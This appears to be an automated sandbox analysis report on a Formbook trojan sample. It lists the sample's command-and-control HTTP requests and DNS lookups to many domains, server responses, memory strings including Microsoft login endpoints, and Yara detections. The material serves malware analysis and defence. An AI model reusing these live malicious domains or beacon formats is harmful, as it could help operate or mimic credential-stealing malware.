            Source: global trafficHTTP traffic detected: GET /mnr7/?GJtTF=-FH8yJw&lv-=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxqOSodO53aJITzDoCBcybRFuSCV6gKg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.alphacentura.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK8/RlnoJvqmanf4TUTsYPUhTHcRSC+WQ==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.xn72dkd7scx.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /s992/?GJtTF=-FH8yJw&lv-=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/to3skHw9ZCkuDTXhooUuE0PnQLiimQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dynamologistics.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /srh8/?lv-=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Tl/MEdpNR0v4ePERtHY07mFLqmHNNg==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.globaltrend.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /y7ar/?lv-=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR8/YoVsWf93Za6ivLQbcIgoRaZNPJDw==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.ffi07s.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /y0md/?lv-=lhYFzH0o7AOzoOxHjW4ZhXPez5XkAFEXcnJkHRBG9JNzObhY0gQYyKrA4KXJDxiKggydmH3cVTSej7Njru8XjftXonC7MPI4x3rx8vtk99+YtwuNug==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.j51a.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /soqq/?GJtTF=-FH8yJw&lv-=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7kx7woR32YUW8PWQ95aiNipO8bO2C7yA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dospole.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /3ooi/?lv-=1LFRRoLbVcSYXTZ6XdBa3kkSOtIcXt0xuK7G7zAfyuAyg5iI4oE5vIWxJ/ECDOK7eTrBqgzuJv49CznNGJBB0jFuKD1kyeaZBLZ0jvvkrC/dFa2PYg==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.tp-consulting.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /93w6/?lv-=V/q1FcXKAyKh7SGyOejAnJ1gdaJ4XypCrXBTkGu72NAGD53UqF3q83lE5VJRfawQqtKzEaQzvnU+DANXYfAkHXtawOjKvPvgjxfsrSG69BVdxcUkzQ==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.lexpaidshares.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /br0f/?lv-=ugi+9bpxNAaZR8wICrxq2eMEzwxItzjvBeZsufXo3FfvAETDHi1JbXCTNdvb4BDU5HS2z+wM6O9UukgZHdIpmHivweVWPh9LzIjwD/7QkR1e8x0qwg==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.viertage.workConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /roex/?lv-=47/hzVl8DcmSvoQ5q5p0wIxjDl6sc/p2osL1e58noL7mmdwCeRUqiv3Sczuo1RIrkshpBASuVUC/h9VDFMrIc6PlwYO66SdA0FrSeVnyMCMUxRe8Kg==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.9988566a4.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficDNS traffic detected: DNS query: www.u9games.xyz
            Source: global trafficDNS traffic detected: DNS query: www.dtalengineering.com
            Source: global trafficDNS traffic detected: DNS query: www.alphacentura.com
            Source: global trafficDNS traffic detected: DNS query: www.xn72dkd7scx.shop
            Source: global trafficDNS traffic detected: DNS query: www.dynamologistics.net
            Source: global trafficDNS traffic detected: DNS query: www.globaltrend.xyz
            Source: global trafficDNS traffic detected: DNS query: www.ffi07s.xyz
            Source: global trafficDNS traffic detected: DNS query: www.j51a.xyz
            Source: global trafficDNS traffic detected: DNS query: www.dospole.top
            Source: global trafficDNS traffic detected: DNS query: www.tp-consulting.net
            Source: global trafficDNS traffic detected: DNS query: www.lexpaidshares.online
            Source: global trafficDNS traffic detected: DNS query: www.viertage.work
            Source: global trafficDNS traffic detected: DNS query: www.9988566a4.shop
            Source: global trafficDNS traffic detected: DNS query: www.rightol.net
            Source: global trafficDNS traffic detected: DNS query: www.wegamovies.online
            Source: unknownHTTP traffic detected: POST /la5g/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateHost: www.dtalengineering.comContent-Length: 192Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Origin: http://www.dtalengineering.comReferer: http://www.dtalengineering.com/la5g/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Jul 2024 10:09:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Jul 2024 10:09:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Jul 2024 10:09:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Jul 2024 10:09:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: 0 NC:000000 UP:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 10:09:45 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5lRLjnKnb6m%2FNFuJVhLLnR87HvA7TixrfpwVhIhOGD8iuBYKSawC8WFn2Xz8lVkVoeHYc%2FNDSkUXxK5%2F%2FpDealfy%2BP1M1jDJEM9cvfeTc68GF5o8hzjndM9eEeyySYjcng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a0785332c278cba-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 10:09:48 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4tbB1IVtzmAALw6w487BfEl8wHN7TLu1UEbzaemxPWpEmlGyUH8x7ZQofwZz1ASITEHoTAX%2BvAnRKpGQnibEk195%2B9jVuA4urDVYgmHUdO1YzH4bBag%2Bww59qFrgwy4Mfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a0785435bb96a5f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 10:09:51 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BPR%2FbKwVoeKOOgpIs%2FuciWz6Un4VHFXYev0EsEzqhsb0vf8IuI0pH4ciZEtNxMqtpNmCAErJXYin2SdKMYy1HnqP9i5%2BvNfhKhYNupHBb%2BhicBTRDrgPMA2llrLdZEcfwg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a078553881f0f8b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 10:09:53 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2pCRg47DPFKj4inlIhUwV0x07Y7XsBvb5GG5qpgFM3%2BNlPbvUyRwVKE1h15CLBZEK6A5MVlEaTEoqx1uoCIFSyZZ2ruI02YfqEbup2RH2TsXtaRWlzxN%2FufjjBx8X%2BuqlA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a078563aaa97cf9-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 09 Jul 2024 10:10:14 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 09 Jul 2024 10:10:16 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 09 Jul 2024 10:10:19 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 09 Jul 2024 10:10:22 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 09 Jul 2024 10:10:30 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 09 Jul 2024 10:10:35 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 09 Jul 2024 10:11:09 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 09 Jul 2024 10:11:12 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 09 Jul 2024 10:11:14 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 09 Jul 2024 10:11:17 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: Inquiry PR#27957.bat.exe, fuqwoDzun.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: Inquiry PR#27957.bat.exe, fuqwoDzun.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: Inquiry PR#27957.bat.exe, fuqwoDzun.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1351958774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fuqwoDzun.exe, 0000000A.00000002.1568631756.0000000002779000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: TsdBVAGjsKVoi.exe, 00000015.00000002.3791731697.0000000005105000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.9988566a4.shop
            Source: TsdBVAGjsKVoi.exe, 00000015.00000002.3791731697.0000000005105000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.9988566a4.shop/roex/
            Source: sfc.exe, 00000011.00000002.3790282223.00000000043AE000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.000000000382E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.globaltrend.xyz
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sfc.exe, 00000011.00000002.3792533848.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3790282223.0000000003D66000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.00000000031E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://badges.ausowned.com.au/07634
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sfc.exe, 00000011.00000002.3790282223.0000000004864000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000003CE4000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sfc.exe, 00000011.00000002.3790282223.000000000421C000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.000000000369C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: sfc.exe, 00000011.00000002.3790282223.00000000046D2000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000003B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://http.gn301.com:12345/?u=
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sfc.exe, 00000011.00000003.1952419416.0000000007C3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srfken
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sfc.exe, 00000011.00000002.3790282223.0000000003D66000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.00000000031E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://ventraip.com.au/favicon.ico
            Source: Inquiry PR#27957.bat.exe, fuqwoDzun.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: sfc.exe, 00000011.00000002.3790282223.0000000004B88000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000004008000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.lexpaidshares.online/93w6/?lv-=V/q1FcXKAyKh7SGyOejAnJ1gdaJ4XypCrXBTkGu72NAGD53UqF3q83lE5
            Source: sfc.exe, 00000011.00000002.3790282223.0000000003BD4000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000003054000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2097655190.000000000D334000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.u9games.xyz/5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5
            Source: sfc.exe, 00000011.00000002.3790282223.000000000408A000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.000000000350A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.xn72dkd7scx.shop/emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs

            E-Banking Fraud

            Source: Yara match; File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
